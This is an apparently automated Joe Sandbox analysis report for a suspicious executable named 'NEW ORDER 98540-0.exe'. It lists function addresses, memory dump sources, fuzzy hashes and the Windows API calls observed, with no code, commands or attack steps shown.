Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f426eec31434292ff7da98cac4fbe94630b0a61e0efa725655213734978561fc
Instruction ID: c6547b86ec14d71ee6b1af0ccd5c232a9e0a5ef0dfcc9bf505c87c2c59510fdb
Opcode Fuzzy Hash: f426eec31434292ff7da98cac4fbe94630b0a61e0efa725655213734978561fc
Instruction Fuzzy Hash: EF3149B6800248DFCB11CFA9D985AEEBFF4FB08320F54845AE814B7251D339A944CF61

Uniqueness

Uniqueness Score: -1.00%

Function 055C0040 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 055C00C7

Memory Dump Source

Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 91667d6b62e89db6d25385b5b57c9fbdd683d87de46fb700844fc592bee99622
Instruction ID: c1f946e3ec422fdc22325fa1822a2354b22350225ad54e8586700443c9746ceb
Opcode Fuzzy Hash: 91667d6b62e89db6d25385b5b57c9fbdd683d87de46fb700844fc592bee99622
Instruction Fuzzy Hash: 5021E4B5900209DFDB10CF9AD984ADEBFF4FB48320F14845AE918A3350D379A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0137D4B0 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0137DD21,00000800,00000000,00000000), ref: 0137DF32

Memory Dump Source

Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8d592d41cf1f943940ab1a355a924a8f6d7ab7c17a3e3a643e953b72e420f571
Instruction ID: 6ed17a7422122b9e21f6f8d601ee4efadb23f1fdf82c3c6e2e889fcb93534d5a
Opcode Fuzzy Hash: 8d592d41cf1f943940ab1a355a924a8f6d7ab7c17a3e3a643e953b72e420f571
Instruction Fuzzy Hash: C31114B68043499FDB20CF9AC944A9EFBF4EF88314F10842AE519A7600C379A545CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0137DC40 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0137DCA6

Memory Dump Source

Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0258bf1fbe53982709c1e2f81ba09ca28d7ff5c4060bfae475fa31b088c9db21
Instruction ID: ef2c7011cc0d203577825ee00c24648f1f6076e5533516412cbe0909ff57f472
Opcode Fuzzy Hash: 0258bf1fbe53982709c1e2f81ba09ca28d7ff5c4060bfae475fa31b088c9db21
Instruction Fuzzy Hash: 791110B6C0034A8FDB20CF9AC544BDEFBF4AF88224F10841AD918B7200D3B9A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0131D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107294713.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131d000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 046e5db57a984687a8bdf4883ebad427e30405e751651c8ddabe245c1160ba36
Instruction ID: 7a0d9fae1bbc6b3a8fd1a240ac829e6337eee5726ceaed9253692cea2e14779b
Opcode Fuzzy Hash: 046e5db57a984687a8bdf4883ebad427e30405e751651c8ddabe245c1160ba36
Instruction Fuzzy Hash: C0216A72144204DFDB09DF44D9C4B66BF65FB88328F20C56CE90A1B25ACB36E456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0132D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107352263.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26d23c9fce8ba2e0d798d37ff4a01fbc0cd03eb7b8dcd6ca5165d61f7572110
Instruction ID: 883d0120876f3938847ba48e3f70c9b247572dfb72383f83f9355d1109464411
Opcode Fuzzy Hash: e26d23c9fce8ba2e0d798d37ff4a01fbc0cd03eb7b8dcd6ca5165d61f7572110
Instruction Fuzzy Hash: 83214671504304EFDB05EF94D9C0B26BBA5FB85328F20C56DE9094B252C776D406CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0132D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107352263.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09a8f1dea3537bceca2265e6d2a412109e6c7086e4040347629d0d262bfac959
Instruction ID: 23d2eba00af535b3a1af30c63a8c0905c8dd7a54a17843326fc6e3d54197b639
Opcode Fuzzy Hash: 09a8f1dea3537bceca2265e6d2a412109e6c7086e4040347629d0d262bfac959
Instruction Fuzzy Hash: D3213475604344EFDB15EF54D9C0B26BF65FB84318F20C56DD90A0B2A6C77AD407CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0132D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107352263.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c2d574518cd4aa26ea1a7301a33f367d9be3111c9cd45d224bf54665a59eaa
Instruction ID: 8b9d9be5050cf352207ae1db545714b410343eae9534b3b6f7324d2bf437598b
Opcode Fuzzy Hash: 94c2d574518cd4aa26ea1a7301a33f367d9be3111c9cd45d224bf54665a59eaa
Instruction Fuzzy Hash: BD2180755083809FCB02DF64D994715BF71EB46218F28C5DAD8498F2A7C33A9816CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0131D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107294713.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131d000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: ba7f4d496f614ce480ae26b42b79ba31260e533d1edeed82322ca7cd473a0b7d
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: C11126B6404280CFCB16CF44D5C4B56BF71FB84328F24C6A9D8090B25BC73AE456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0132D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107352263.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 681e35ae1a07b6eb3c6bdabea06138533094b681fa0b7d9863f84abed262ae1f
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 9311BB75504380DFDB02DF54D5C0B15BBB1FB85228F24C6A9D8494B2A6C33AD40ACB61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01378F82 Relevance: 1.4, Strings: 1, Instructions: 185COMMON

Download Yara Rule

Strings

, xrefs: 013790AE

Memory Dump Source

Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 5792d64da9808bf7346c03161e469a251873eed9fafff294e9a7d9a10abbf123
Instruction ID: 137fbeddab13c4f9b40dc4d613c8db0d00a757a7b7f0813f6e0f32c7b86043c5
Opcode Fuzzy Hash: 5792d64da9808bf7346c03161e469a251873eed9fafff294e9a7d9a10abbf123
Instruction Fuzzy Hash: 5951D131B101168FCB65DFADDC846AEBBB2EBC82297158179D605CB355EB74EC428780

Uniqueness

Uniqueness Score: -1.00%

Function 055C2D00 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dd440a8cb38fb041c8b310c7d92dfe139cbfff4a06082cd3f64eb5061269906
Instruction ID: ad5f0b8bb8eb28a762bc19063bac05b909b9fb0f640d3544c98b74146bc58fb7
Opcode Fuzzy Hash: 8dd440a8cb38fb041c8b310c7d92dfe139cbfff4a06082cd3f64eb5061269906
Instruction Fuzzy Hash: 621290B1401746DAEB30CF69E84C1897BB9BB81328FD04309D6616B6EDDBB8154BCF84

Uniqueness

Uniqueness Score: -1.00%

Function 055C0944 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873b66a02c5991f44a14abc8a4ce32564a7218011977e2fd04130fee13a972bd
Instruction ID: 0321a6eff75beac5c08ec123a191a7b1494847c18cc2d03859f01bcdacea6766
Opcode Fuzzy Hash: 873b66a02c5991f44a14abc8a4ce32564a7218011977e2fd04130fee13a972bd
Instruction Fuzzy Hash: 51A15136E00216CFCF15DFA4C8485AEBBB2FF85300B1545AEE906AB265DB71D945CB80

Uniqueness

Uniqueness Score: -1.00%

Function 055C2CF0 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2cd13091c8a63f401a781b058dbe561f31f4e10a40b8164b8a5f804edaa7cdd
Instruction ID: 3ada4355d7946e37196c66f5edd7a1e47c4a4c549900ae86223a4e0daea4291f
Opcode Fuzzy Hash: f2cd13091c8a63f401a781b058dbe561f31f4e10a40b8164b8a5f804edaa7cdd
Instruction Fuzzy Hash: 15C115B1801745DBDB20CF69E84C1897BB9BB85324F914319D2616B2EDDBB8158BCF84

Uniqueness

Uniqueness Score: -1.00%

Function 01377458 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d97aba45fa73ef96f6c80d65a99c87ccb2838361aa0a47c976a647e0e614a03
Instruction ID: 053af7225e1784a495768d1b4972f5a38493dfc2103bc6a78712ee4925585cb2
Opcode Fuzzy Hash: 3d97aba45fa73ef96f6c80d65a99c87ccb2838361aa0a47c976a647e0e614a03
Instruction Fuzzy Hash: 6681F9B8D4010FDFDF24CFAAD584AAEBBB1BB48314F10A659D412EB254DB3599418F50

Uniqueness

Uniqueness Score: -1.00%

Function 01378D11 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3faaa1c0a61565e62678eb2e32848acca8d4b0f8906273a80f1538b89e47fcab
Instruction ID: a32befa408ce3eaafcdc2462ce84ec3ca94d0621697de6b987030695df9b8f7e
Opcode Fuzzy Hash: 3faaa1c0a61565e62678eb2e32848acca8d4b0f8906273a80f1538b89e47fcab
Instruction Fuzzy Hash: DC614E32F115258FD714DB69CC84A5EB7E3AFC8714F1A81A4E409AB356DE74EC018B80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NEW ORDER 98540-0.exePID: 5476, Parent PID: 6028COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 030D9B30 Relevance: 2.8, Instructions: 2811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fbcbf3923ea7fa941295e8de5a894953165aebff5d3f5a7c1a9f6be761d4930
Instruction ID: 95c9176e2f7a822a120b4dfc0d813353141b81a6f4f0e30596f7408eb2ffd0f4
Opcode Fuzzy Hash: 1fbcbf3923ea7fa941295e8de5a894953165aebff5d3f5a7c1a9f6be761d4930
Instruction Fuzzy Hash: 8453F531D10B5A8ADB51EF68C8805A9F7B1FF99300F15D79AE4587B121FB70AAC4CB81

Uniqueness

Uniqueness Score: -1.00%

Function 030DCDA8 Relevance: 2.3, Instructions: 2341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf99d962afa96f7d330b9da63254f3e31b7fc8a701c4a11f78651e992698225
Instruction ID: 379c21a155579854bce30db3d48a908ad5b8e14489316fce58ca0053df8e9a2c
Opcode Fuzzy Hash: fdf99d962afa96f7d330b9da63254f3e31b7fc8a701c4a11f78651e992698225
Instruction Fuzzy Hash: 5D331C31D1071A8ADB11EF68C8806ADF7B5FF99300F15C79AD449AB215EB70AAC5CF81

Uniqueness

Uniqueness Score: -1.00%

Function 030D3E80 Relevance: 1.5, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vm, xrefs: 030D40CB

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID: \Vm
API String ID: 0-711957416
Opcode ID: 5fce3a8b6f84b9918dfef2f8f0772ac82ee3aad80fe9f1a8373dea9e33254895
Instruction ID: 0fdcf017635817dc317ddfff3d21a4f659d04e0afac1dab9618be1cb35e49bac
Opcode Fuzzy Hash: 5fce3a8b6f84b9918dfef2f8f0772ac82ee3aad80fe9f1a8373dea9e33254895
Instruction Fuzzy Hash: 45916A74E01309DFDF50CFAAD9857DEBBF2AF88314F188129E415AB294EB749845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 030D4A98 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bae66e13ccaab0e1e9dc62afacdfd8f011979e4b68a79e27998681072be32eb
Instruction ID: ab29d722f8909de5a79024d60d7a3c9ff27217665d4d997c6c0d5be08b4f79e4
Opcode Fuzzy Hash: 1bae66e13ccaab0e1e9dc62afacdfd8f011979e4b68a79e27998681072be32eb
Instruction Fuzzy Hash: 6DB15B70E013098FDF50CFAAC8957ADBBF2AF88714F198529D815EB294EB749845CF81

Uniqueness

Uniqueness Score: -1.00%

Function 030D4804 Relevance: 2.7, Strings: 2, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vm, xrefs: 030D49D2
\Vm, xrefs: 030D487F

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID: \Vm$\Vm
API String ID: 0-4290693290
Opcode ID: dbc5f7991a595ad0c9733d61cfecfc874a46a4d4dba808c6d3cddd6ce0375c94
Instruction ID: 89b4d71a088437327ea25f4760b7b02e93077a9e02917e7cc054dd4b987e026e
Opcode Fuzzy Hash: dbc5f7991a595ad0c9733d61cfecfc874a46a4d4dba808c6d3cddd6ce0375c94
Instruction Fuzzy Hash: 17719970E01349DFDF10CFAAC98579EFBF2AF88714F188129E419AB254EB749841CB95

Uniqueness

Uniqueness Score: -1.00%

Function 030D4810 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vm, xrefs: 030D49D2
\Vm, xrefs: 030D487F

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID: \Vm$\Vm
API String ID: 0-4290693290
Opcode ID: b5f7d51203a442219629db74c7e607372b4d82252940eaf4992be3efe9cd5bcb
Instruction ID: bd1b01e7a075c6ae16031e00c2f08b4a9d3c005c1220bf4980928d81699064d2
Opcode Fuzzy Hash: b5f7d51203a442219629db74c7e607372b4d82252940eaf4992be3efe9cd5bcb
Instruction Fuzzy Hash: A6717A70E01349CFDF50CFAAC98579EFBF2AF88714F188129E419AB254EB749841CB95

Uniqueness

Uniqueness Score: -1.00%

Function 067CE270 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 067CE2DF

Memory Dump Source

Source File: 00000003.00000002.3346016199.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_67c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: f94724b29e403125453a14bb091596e01ba57046b2e7c205c236aaa33df8a090
Instruction ID: 0395bf3d8136f6b9aa17526390615d751a037cb0081e88af10e71cdce4d5e63d
Opcode Fuzzy Hash: f94724b29e403125453a14bb091596e01ba57046b2e7c205c236aaa33df8a090
Instruction Fuzzy Hash: E41103B1C0066A9FDB10CF9AC5447EEFBF4AF48720F14816AD918A7240D778A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 067CE278 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 067CE2DF

Memory Dump Source

Source File: 00000003.00000002.3346016199.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_67c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: e136e6ca7e84470fda226faad973b5ef7ef1a8932a2b5bbbc1566a709a776e6f
Instruction ID: fd13b59599b439a2d261e94e53c03d7d366c870add36b6698db83ebeaee2200d
Opcode Fuzzy Hash: e136e6ca7e84470fda226faad973b5ef7ef1a8932a2b5bbbc1566a709a776e6f
Instruction Fuzzy Hash: 321114B1C0065A9BCB10CF9AC54479EFBF4AF48320F14816AD918B7240D778A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 030D3E74 Relevance: 1.5, Strings: 1, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vm, xrefs: 030D40CB

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID: \Vm
API String ID: 0-711957416
Opcode ID: 0f5f62964ee4d1784ae184e62061205730946ad2ff64b467643f6fd11a76cd1f
Instruction ID: 923dbab06f650075bfab329743a343eafdf4a2cae1c3555d0ba5ea66c1e50d97
Opcode Fuzzy Hash: 0f5f62964ee4d1784ae184e62061205730946ad2ff64b467643f6fd11a76cd1f
Instruction Fuzzy Hash: 75A15A74E01349CFDF50CFAAD9857DEBBF2AF88314F188129E415AB254EB749845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 030D790B Relevance: .6, Instructions: 553
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c7aa0a3eec862b23bcaab54ca4037056cb9e8eccb39028ff606f0694b8a4d71
Instruction ID: 0734eac20ca88b7f504ae7b9f5c5bd309e82934e51a71647f1c3fdb5e82eb468
Opcode Fuzzy Hash: 8c7aa0a3eec862b23bcaab54ca4037056cb9e8eccb39028ff606f0694b8a4d71
Instruction Fuzzy Hash: 96129130701207CBDB5A9B38F98522C3AE6FBC9710B64897DE505CB360CE7ADC869785

Uniqueness

Uniqueness Score: -1.00%

Function 030D96E0 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef9403169e4984a1e6fc02011802b435d5bf6a051743c9bc401d8ab51eb5f470
Instruction ID: 2a1628178a33541f5a7e3a0f32024fe43e4ec578af83ea13e31b725559568e36
Opcode Fuzzy Hash: ef9403169e4984a1e6fc02011802b435d5bf6a051743c9bc401d8ab51eb5f470
Instruction Fuzzy Hash: 18D1AD71A012058FDB54DF68D8807AEBBF5FF88310F2485AAE909EB395DB74D845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 030D4A8F Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edcd1f00134c2039a10b7113328bf7766851ed02a129f0c393dd3624c5c5821e
Instruction ID: 5f8042b0a7825435ad701c8fbfd931124f6eddcf0485b0049cdfe9a05fb5a299
Opcode Fuzzy Hash: edcd1f00134c2039a10b7113328bf7766851ed02a129f0c393dd3624c5c5821e
Instruction Fuzzy Hash: 07A15C70E013498FDB50CFAAC98579DFBF1AF88714F188529D818EB254EB749845CF81

Uniqueness

Uniqueness Score: -1.00%

Function 030D93D9 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dd902c298ee7d1cc2969ee091629acdeb1b3bef43d596a901afd1058420056f
Instruction ID: d4c9c99df1ffb85719332cb0e11a064b7078d7eb82e99e6199b381abd9edca0e
Opcode Fuzzy Hash: 0dd902c298ee7d1cc2969ee091629acdeb1b3bef43d596a901afd1058420056f
Instruction Fuzzy Hash: BBA15A34A01205DFDB55DB68E594AADBBF6FF88310F248568E806EB364DB34EC42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 030D6EDB Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 956e95c9fc693785f326dbf7e5066cc26348b28058c39a2ae2468537470392b8
Instruction ID: 6eac286d5490f1bbad5a4afcc6bcef60285443763b3e3cf1c9fa003b507603a7
Opcode Fuzzy Hash: 956e95c9fc693785f326dbf7e5066cc26348b28058c39a2ae2468537470392b8
Instruction Fuzzy Hash: 2451CE30A0234A9FDB14DF64D45479EBBF6FF85310F64846AE406EB290DB72A8468B91

Uniqueness

Uniqueness Score: -1.00%

Function 030D6CDC Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e650331ef0e235eb043d53f4643239456b9cfce837a13c0bee7abfbaf5bb54c
Instruction ID: 16d9a3be3b77fe4fcba9ca2acc14aed4d77da8167dae96c2562063ea3193c36b
Opcode Fuzzy Hash: 2e650331ef0e235eb043d53f4643239456b9cfce837a13c0bee7abfbaf5bb54c
Instruction Fuzzy Hash: E1510F70E013588FDB18CFA9D888B9DFBF1BF48310F58852AE819BB255D775A844CB94

Uniqueness

Uniqueness Score: -1.00%

Function 030D6CE8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 982fe171c8958862251fffc85e7043fb15961cdd5303aa6a8f218df1c1930630
Instruction ID: ce5ac36116dbfe79fa392a7f7826850fc5696f934e632214eaf3eca2f1361890
Opcode Fuzzy Hash: 982fe171c8958862251fffc85e7043fb15961cdd5303aa6a8f218df1c1930630
Instruction Fuzzy Hash: 9651F070D013188FDB14CFA9D884B9EBBF1AF48310F58851AE815BB255DB75A844CB94

Uniqueness

Uniqueness Score: -1.00%

Function 030D1878 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0dff79231f435e173e012b13669f8db1245bdf8a09964f25d05a876bc0d4e14
Instruction ID: fb6c25773197e1f253f1281626ec064aac57001d961682327e8a70c848685531
Opcode Fuzzy Hash: b0dff79231f435e173e012b13669f8db1245bdf8a09964f25d05a876bc0d4e14
Instruction Fuzzy Hash: 4241E234B023419FEB98DB24E5047AEBBF5EF89200F1805A9D506DB251DF3A9C41CB96

Uniqueness

Uniqueness Score: -1.00%

Function 030D112B Relevance: .1, Instructions: 118COMMON

